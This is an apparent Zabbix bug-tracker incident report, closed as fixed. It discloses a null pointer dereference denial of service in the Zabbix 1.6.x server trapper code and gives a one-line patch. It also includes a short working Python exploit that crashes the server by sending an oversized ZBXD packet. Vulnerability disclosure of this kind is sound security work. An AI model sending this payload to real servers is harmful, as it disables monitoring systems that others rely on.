Details

    • Type: Incident report
    • Status: Closed
    • Priority: Critical
    • Resolution: Fixed
    • Affects Version/s: 1.6
    • Fix Version/s: 1.6
    • Component/s: Proxy (P), Server (S)
    • Labels:
      None
    • Environment:
      Zabbix server v1.6.x

      Description

      While reading Zabbix source code, I found a small error leading to an
      easy to exploit denial of service vulnerability (tested in version 1.6.1
      as shipped on Ubuntu and 1.6.5 compiled from source).

      In src/zabbix_server/trapper/trapper.c, function process_trap() :

      1. Make a truncated to 2047 copy of "s"
        strscpy(copy,s);
      1. Check if there's some ":" in "s" (and not in "copy" !)
        server=(char *)strtok(s,":");

      [...]

      1. Look for the 1st ":" in "copy"
        value_string=strchr(copy,':');
      1. If 1st ":" in "s" if after offset 2047
      2. we got a null ptr deference crash
        value_string=strchr(value_string+1,':');

      The patch is trivial : just use "copy" instead of "s" in your check.

      server=(char *)strtok(copy,":");

      Exploit code :

      8<-----------------------------------------------------------------
      #!/usr/bin/python

      PORT = 10051
      HOST = "192.168.2.89"

      import socket
      import struct

      try:
      socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
      socket.settimeout(3)
      socket.connect((HOST, PORT))

      header = 'ZBXD\x01'

      1. DoS in ./src/zabbix_server/trapper/trapper.c
      2. If first ":" is after 2047 => DoS when reading NULL+1
        data = 'A'*2050 + ':B'

      size = struct.pack('q', len(data))
      socket.send(header + size + data)
      rcvdata = socket.recv(10240)
      print rcvdata
      except:
      print "FAIL"

      socket.close()
      8<-----------------------------------------------------------------

        Attachments

          Activity

            People

            • Assignee:
              sasha Alexander Vladishev
              Reporter:
              sasha Alexander Vladishev
            • Votes:
              0 Vote for this issue
              Watchers:
              2 Start watching this issue

              Dates

              • Created:
                Updated:
                Resolved: